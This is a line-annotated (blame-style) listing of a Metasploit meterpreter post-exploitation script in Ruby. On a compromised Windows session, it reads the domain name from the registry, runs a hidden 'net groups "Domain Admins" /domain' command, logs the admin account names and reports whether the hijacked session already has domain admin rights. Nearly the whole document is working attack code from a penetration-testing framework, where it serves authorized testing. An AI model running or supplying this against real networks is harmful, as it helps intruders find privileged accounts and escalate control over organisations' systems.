2014-09-16 21:41:14 +00:00
|
|
|
##
|
|
|
|
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
|
2018-02-13 11:30:05 +00:00
|
|
|
# If you'd like to improve this script, please try to port it as a post
|
2014-09-16 21:41:14 +00:00
|
|
|
# module instead. Thank you.
|
|
|
|
##
|
|
|
|
|
|
|
|
|
2010-06-23 00:52:25 +00:00
|
|
|
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
|
2010-04-24 15:21:13 +00:00
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
#Options and Option Parsing
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
2013-09-30 18:47:53 +00:00
|
|
|
"-h" => [ false, "Help menu." ]
|
2010-04-24 15:21:13 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
2013-09-30 18:47:53 +00:00
|
|
|
case opt
|
|
|
|
when "-h"
|
|
|
|
print_line "Meterpreter Script for extracting Doamin Admin Account list for use."
|
|
|
|
print_line "in token_hunter plugin and verifies if current account for session is"
|
|
|
|
print_line "is a member of such group."
|
|
|
|
print_line(opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
2010-04-24 15:21:13 +00:00
|
|
|
}
|
2010-09-09 16:09:27 +00:00
|
|
|
|
|
|
|
def unsupported
|
2013-09-30 18:47:53 +00:00
|
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
|
|
raise Rex::Script::Completed
|
2010-09-09 16:09:27 +00:00
|
|
|
end
|
2010-04-24 15:21:13 +00:00
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
#Set General Variables used in the script
|
2011-01-10 00:35:45 +00:00
|
|
|
|
|
|
|
@client = client
|
2010-04-24 15:21:13 +00:00
|
|
|
users = ""
|
|
|
|
list = []
|
|
|
|
host = @client.sys.config.sysinfo['Computer']
|
2011-01-10 00:35:45 +00:00
|
|
|
current_user = @client.sys.config.getuid.scan(/\S*\\(.*)/)
|
|
|
|
|
|
|
|
def reg_getvaldata(key,valname)
|
2013-09-30 18:47:53 +00:00
|
|
|
value = nil
|
|
|
|
begin
|
|
|
|
root_key, base_key = @client.sys.registry.splitkey(key)
|
|
|
|
open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
|
|
|
|
v = open_key.query_value(valname)
|
|
|
|
value = v.data
|
|
|
|
open_key.close
|
|
|
|
end
|
|
|
|
return value
|
2011-01-10 00:35:45 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
domain = reg_getvaldata("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon","DefaultDomainName")
|
2011-10-23 11:56:13 +00:00
|
|
|
if domain == ""
|
2013-09-30 18:47:53 +00:00
|
|
|
print_error("domain not found")
|
2011-01-10 00:35:45 +00:00
|
|
|
end
|
|
|
|
|
2010-04-24 15:21:13 +00:00
|
|
|
# Create Filename info to be appended to downloaded files
|
2010-06-23 00:52:25 +00:00
|
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
2011-01-10 00:35:45 +00:00
|
|
|
|
2017-04-26 04:31:39 +00:00
|
|
|
unsupported if client.platform != 'windows'
|
2011-01-10 00:35:45 +00:00
|
|
|
|
2010-04-24 15:21:13 +00:00
|
|
|
# Create a directory for the logs
|
2010-06-23 00:52:25 +00:00
|
|
|
logs = ::File.join(Msf::Config.log_directory, 'scripts','domain_admins')
|
2010-04-24 15:21:13 +00:00
|
|
|
# Create the log directory
|
|
|
|
::FileUtils.mkdir_p(logs)
|
|
|
|
#logfile name
|
2011-01-25 02:24:37 +00:00
|
|
|
dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")
|
2010-04-24 15:21:13 +00:00
|
|
|
print_status("found users will be saved to #{dest}")
|
2010-06-23 00:52:25 +00:00
|
|
|
|
2010-04-24 15:21:13 +00:00
|
|
|
################## MAIN ##################
|
|
|
|
#Run net command to enumerate users and verify that it ran successfully
|
|
|
|
cmd = 'net groups "Domain Admins" /domain'
|
|
|
|
r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
|
|
|
while(d = r.channel.read)
|
2013-09-30 18:47:53 +00:00
|
|
|
users << d
|
|
|
|
if d=~/System error/
|
|
|
|
print_error("Could not enumerate Domain Admins!")
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
break if d == ""
|
2010-04-24 15:21:13 +00:00
|
|
|
end
|
|
|
|
#split output in to lines
|
|
|
|
out_lines = users.split("\n")
|
|
|
|
#Select only those lines that have the usernames
|
|
|
|
a_size = (out_lines.length - 8)
|
|
|
|
domadmins = out_lines.slice(6,a_size)
|
|
|
|
#get only the usernames out of those lines
|
|
|
|
domainadmin_user_list = []
|
2010-04-25 13:55:22 +00:00
|
|
|
domadmins.each do |d|
|
2013-09-30 18:47:53 +00:00
|
|
|
d.split(" ").compact.each do |s|
|
|
|
|
domainadmin_user_list << s.strip if s.strip != "" and not s =~ /----/
|
|
|
|
end
|
2010-04-24 15:21:13 +00:00
|
|
|
end
|
|
|
|
#process accounts found
|
|
|
|
print_status("Accounts Found:")
|
|
|
|
domainadmin_user_list.each do |u|
|
2013-09-30 18:47:53 +00:00
|
|
|
print_status("\t#{domain}\\#{u}")
|
|
|
|
file_local_write(dest, "#{domain}\\#{u}")
|
|
|
|
list << u.downcase
|
2010-04-24 15:21:13 +00:00
|
|
|
end
|
2010-04-25 15:41:50 +00:00
|
|
|
if list.index(current_user.join.chomp.downcase)
|
2013-09-30 18:47:53 +00:00
|
|
|
print_status("Current sessions running as #{domain}\\#{current_user.join.chomp} is a Domain Admin!!")
|
2010-04-24 15:21:13 +00:00
|
|
|
else
|
2013-09-30 18:47:53 +00:00
|
|
|
print_error("Current session running as #{domain}\\#{current_user.join.chomp} is not running as Domain Admin")
|
2010-04-24 15:21:13 +00:00
|
|
|
end
|
2011-01-10 00:35:45 +00:00
|
|
|
|